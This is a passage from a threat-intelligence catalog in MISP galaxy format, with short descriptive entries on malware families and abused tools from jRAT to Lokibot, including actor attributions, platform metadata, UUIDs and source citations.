Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0201 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
jRAT
jRAT is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of jRAT have been distributed via a software-as-a-service platform, similar to an online subscription model.[Kaspersky Adwind Feb 2016] [jRAT Symantec Aug 2018]
Internal MISP references
UUID 42fe9795-5cf6-4ad7-b56e-2aa655377992 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
| software_attack_id | S0283 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Jsc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Resources: * https://twitter.com/DissectMalware/status/998797808907046913 * https://www.phpied.com/make-your-javascript-a-windows-exe/
Detection: * Sigma: proc_creation_win_lolbin_jsc.yml * IOC: Jsc.exe should normally not run a system unless it is used for development.[Jsc.exe - LOLBAS Project]
Internal MISP references
UUID 1c67bf0b-22f8-4f57-8f91-f15b4923455f which can be used as unique global reference for Jsc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5122 |
| source | Tidal Cyber |
| tags | ['ee16a0c7-b3cf-4303-9681-b3076da9bff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
JSS Loader
JSS Loader is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by FIN7 since at least 2020.[eSentire FIN7 July 2021][CrowdStrike Carbon Spider August 2021]
Internal MISP references
UUID c67f3029-a26c-4752-b7f1-8e3369c2f79d which can be used as unique global reference for JSS Loader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0648 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KARAE
KARAE is a backdoor typically used by APT37 as first-stage malware. [FireEye APT37 Feb 2018]
Internal MISP references
UUID ca883d21-97ca-420d-a66b-ef19a8355467 which can be used as unique global reference for KARAE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0215 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kasidet
Kasidet is a backdoor that has been dropped by using malicious VBA macros. [Zscaler Kasidet]
Internal MISP references
UUID 1896b9c9-a93e-4220-b4c2-6c4c9c5ca297 which can be used as unique global reference for Kasidet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0088 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Kazuar
Kazuar is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. [Unit 42 Kazuar May 2017]
Internal MISP references
UUID e93990a0-4841-4867-8b74-ac2806d787bf which can be used as unique global reference for Kazuar in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Windows'] |
| software_attack_id | S0265 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kerrdown
Kerrdown is a custom downloader that has been used by APT32 since at least 2018 to install spyware from a server on the victim's network.[Amnesty Intl. Ocean Lotus February 2021][Unit 42 KerrDown February 2019]
Internal MISP references
UUID 17c28e46-1005-4737-8567-d4ad9f1aefd1 which can be used as unique global reference for Kerrdown in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0585 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kessel
Kessel is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. Kessel has been active since its C2 domain began resolving in August 2018.[ESET ForSSHe December 2018]
Internal MISP references
UUID 32f1e0d3-753f-4b51-aec5-cfaa393cedc3 which can be used as unique global reference for Kessel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0487 |
| source | MITRE |
| type | ['malware'] |
Kevin
Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[Kaspersky Lyceum October 2021]
Internal MISP references
UUID b9730d7c-aa57-4d6f-9125-57dcb65b02e0 which can be used as unique global reference for Kevin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1020 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KeyBoy
KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[CitizenLab KeyBoy Nov 2016][PWC KeyBoys Feb 2017]
Internal MISP references
UUID 6ec39371-d50b-43b6-937c-52de00491eab which can be used as unique global reference for KeyBoy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0387 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Keydnap
This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor [OSX Keydnap malware].
Internal MISP references
UUID aefbe6ff-7ce4-479e-916d-e8f0259d81f6 which can be used as unique global reference for Keydnap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0276 |
| source | MITRE |
| type | ['malware'] |
KEYMARBLE
KEYMARBLE is a Trojan that has reportedly been used by the North Korean government. [US-CERT KEYMARBLE Aug 2018]
Internal MISP references
UUID a644f61e-6a9b-41ab-beca-72518351c27f which can be used as unique global reference for KEYMARBLE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0271 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KEYPLUG
KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[Mandiant APT41]
Internal MISP references
UUID ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a which can be used as unique global reference for KEYPLUG in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S1051 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KGH_SPY
KGH_SPY is a modular suite of tools used by Kimsuky for reconnaissance, information stealing, and backdoor capabilities. KGH_SPY derived its name from PDB paths and internal names found in samples containing "KGH".[Cybereason Kimsuky November 2020]
Internal MISP references
UUID c1e1ab6a-d5ce-4520-98c5-c6df41005fd9 which can be used as unique global reference for KGH_SPY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0526 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KillDisk
KillDisk is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of BlackEnergy malware during cyber attacks against Ukraine in 2015. KillDisk has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some KillDisk variants.[KillDisk Ransomware][ESEST Black Energy Jan 2016][Trend Micro KillDisk 1][Trend Micro KillDisk 2]
Internal MISP references
UUID b5532e91-d267-4819-a05d-8c5358995add which can be used as unique global reference for KillDisk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0607 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kinsing
Kinsing is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. [Aqua Kinsing April 2020][Sysdig Kinsing November 2020][Aqua Security Cloud Native Threat Report June 2021]
Internal MISP references
UUID 7b4f157c-4b34-4f55-9c20-ff787495e9ba which can be used as unique global reference for Kinsing in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Containers'] |
| software_attack_id | S0599 |
| source | MITRE |
| tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
| type | ['malware'] |
Kivars
Kivars is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by BlackTech in a 2010 campaign.[TrendMicro BlackTech June 2017]
Internal MISP references
UUID 673ed346-9562-4997-80b2-e701b1a99a58 which can be used as unique global reference for Kivars in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0437 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Koadic
Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[Github Koadic][Palo Alto Sofacy 06-2018][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd which can be used as unique global reference for Koadic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0250 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Kobalos
Kobalos is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. Kobalos has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. Kobalos was first identified in late 2019.[ESET Kobalos Feb 2021][ESET Kobalos Jan 2021]
Internal MISP references
UUID bf918663-90bd-489e-91e7-6951a18a25fd which can be used as unique global reference for Kobalos in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0641 |
| source | MITRE |
| type | ['malware'] |
KOCTOPUS
KOCTOPUS's batch variant is loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant that has the same functionality as the batch version.[MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 3e13d07d-d9e1-4456-bec3-b2375e404753 which can be used as unique global reference for KOCTOPUS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0669 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Komplex
Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX [XAgentOSX 2017] [Sofacy Komplex Trojan].
Internal MISP references
UUID 2cf1be0d-2fba-4fd0-ab2f-3695716d1735 which can be used as unique global reference for Komplex in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0162 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KOMPROGO
KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management. [FireEye APT32 May 2017]
Internal MISP references
UUID 3067f148-2e2b-4aac-9652-59823b3ad4f1 which can be used as unique global reference for KOMPROGO in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0156 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
KONNI
KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[Talos Konni May 2017][Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018][Medium KONNI Jan 2020][Malwarebytes Konni Aug 2021]
Internal MISP references
UUID d381de2a-30cb-4d50-bbce-fd1e489c4889 which can be used as unique global reference for KONNI in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0356 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
KOPILUWAK
KOPILUWAK is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID d09c4459-1aa3-547d-99f4-7ac73b8043f0 which can be used as unique global reference for KOPILUWAK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1075 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kwampirs
Kwampirs is a backdoor Trojan used by Orangeworm. It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. [Symantec Orangeworm April 2018]
Internal MISP references
UUID 35ac4018-8506-4025-a9e3-bd017700b3b3 which can be used as unique global reference for Kwampirs in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0236 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Launch-VsDevShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet
Author: Nasreddine Bencherchali
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
Resources: * https://twitter.com/nas_bench/status/1535981653239255040
Detection: * Sigma: proc_creation_win_lolbin_launch_vsdevshell.yml[Launch-VsDevShell.ps1 - LOLBAS Project]
Internal MISP references
UUID 288b2ab2-255a-457a-a6eb-02ee4711d6b8 which can be used as unique global reference for Launch-VsDevShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5258 |
| source | Tidal Cyber |
| tags | ['5be0da70-9249-44fa-8c3b-7394ef26b2e0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
LaZagne
LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[GitHub LaZagne Dec 2018]
Internal MISP references
UUID f5558af4-e3e2-47c2-b8fe-72850bd30f37 which can be used as unique global reference for LaZagne in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0349 |
| source | MITRE |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '26c5dec7-3184-4873-ae20-9558a498a27f', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ldifde
Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".[Ldifde Microsoft]
Internal MISP references
UUID d0ff555f-ba74-457c-b6e4-02962c230b60 which can be used as unique global reference for Ldifde in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5017 |
| source | Tidal Cyber |
| tags | ['cea43301-9f7a-46a5-be3a-3a09f0f3c09e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
LEMURLOOT
LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.[Mandiant MOVEit Transfer June 2 2023]
Related Vulnerabilities: CVE-2023-34362[U.S. CISA CL0P CVE-2023-34362 Exploitation][Mandiant MOVEit Transfer June 2 2023]
Internal MISP references
UUID d5d79a51-3756-40de-81cd-4dac172fbb74 which can be used as unique global reference for LEMURLOOT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5020 |
| source | Tidal Cyber |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '173e1480-8d9b-49c5-854d-594dde9740d6', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Level
According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID bce485ad-7d4f-45b6-b3c1-218f2f757611 which can be used as unique global reference for Level in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5067 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
LightNeuron
LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of LightNeuron exists.[ESET LightNeuron May 2019]
Internal MISP references
UUID c9d2f023-d54b-4d08-9598-a42fb92b3161 which can be used as unique global reference for LightNeuron in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0395 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ligolo
Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3113cb05-23b4-4f90-ab7a-623b800302ce which can be used as unique global reference for Ligolo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5034 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Linfo
Linfo is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Linfo May 2012]
Internal MISP references
UUID 925975f8-e8ff-411f-a40e-f799968046f7 which can be used as unique global reference for Linfo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0211 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Linux Rabbit
Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[Anomali Linux Rabbit 2018]
Internal MISP references
UUID d017e133-fce9-4982-a2df-6867a80089e7 which can be used as unique global reference for Linux Rabbit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0362 |
| source | MITRE |
| tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', '70dc52b0-f317-4134-8a42-71aea1443707'] |
| type | ['malware'] |
LiteDuke
LiteDuke is a third stage backdoor that was used by APT29, primarily in 2014-2015. LiteDuke used the same dropper as PolyglotDuke, and was found on machines also compromised by MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 71e4028c-9ca1-45ce-bc44-98209ae9f6bd which can be used as unique global reference for LiteDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0513 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
LitePower
LitePower is a downloader and second stage malware that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID cc568409-71ff-468b-9c38-d0dd9020e409 which can be used as unique global reference for LitePower in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0680 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lizar
Lizar is a modular remote access tool written using the .NET Framework that shares structural similarities to Carbanak. It has likely been used by FIN7 since at least February 2021.[BiZone Lizar May 2021][Threatpost Lizar May 2021][Gemini FIN7 Oct 2021]
Internal MISP references
UUID 65d46aab-b3ce-4f5b-b1fc-871db2573fa1 which can be used as unique global reference for Lizar in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0681 |
| source | MITRE |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockBit 3.0
Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[U.S. CISA Understanding LockBit June 2023]
LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[U.S. CISA Understanding LockBit June 2023] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive" than previous LockBit strains.[U.S. CISA LockBit 3.0 March 2023]
According to data collected by the ransomwatch project and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[GitHub ransomwatch]
Delivered By: Cobalt Strike[Sentinel Labs LockBit 3.0 July 2022], PsExec[NCC Group Research Blog August 19 2022]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/
PulseDive (IOCs): https://pulsedive.com/threat/LockBit
Internal MISP references
UUID 08c70ea5-9d4d-4146-826e-c5ebd5490378 which can be used as unique global reference for LockBit 3.0 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5047 |
| source | Tidal Cyber |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '5e7433ad-a894-4489-93bc-41e90da90019', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockerGoga
LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[Unit42 LockerGoga 2019][CarbonBlack LockerGoga 2019]
Internal MISP references
UUID 65bc8e81-0a08-49f6-9d04-a2d63d512342 which can be used as unique global reference for LockerGoga in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0372 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
LogMeIn
LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[LogMeIn Homepage] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[CISA Royal AA23-061A March 2023][CSRB LAPSUS$ July 24 2023]
Internal MISP references
UUID 7b471178-30a1-4c48-bbff-c4d2fdbb35a9 which can be used as unique global reference for LogMeIn in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5073 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoJax
LoJax is a UEFI rootkit used by APT28 to persist remote access software on targeted systems.[ESET LoJax Sept 2018]
Internal MISP references
UUID 039f34e9-f379-4a24-a53f-b28ba579854c which can be used as unique global reference for LoJax in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0397 |
| source | MITRE |
| tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lokibot
Lokibot is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. Lokibot can also create a backdoor into infected systems to allow an attacker to install additional payloads.[Infoblox Lokibot January 2019][Morphisec Lokibot April 2020][CISA Lokibot September 2020]
Internal MISP references
UUID 4fead65c-499d-4f44-8879-2c35b24dac68 which can be used as unique global reference for Lokibot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0447 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
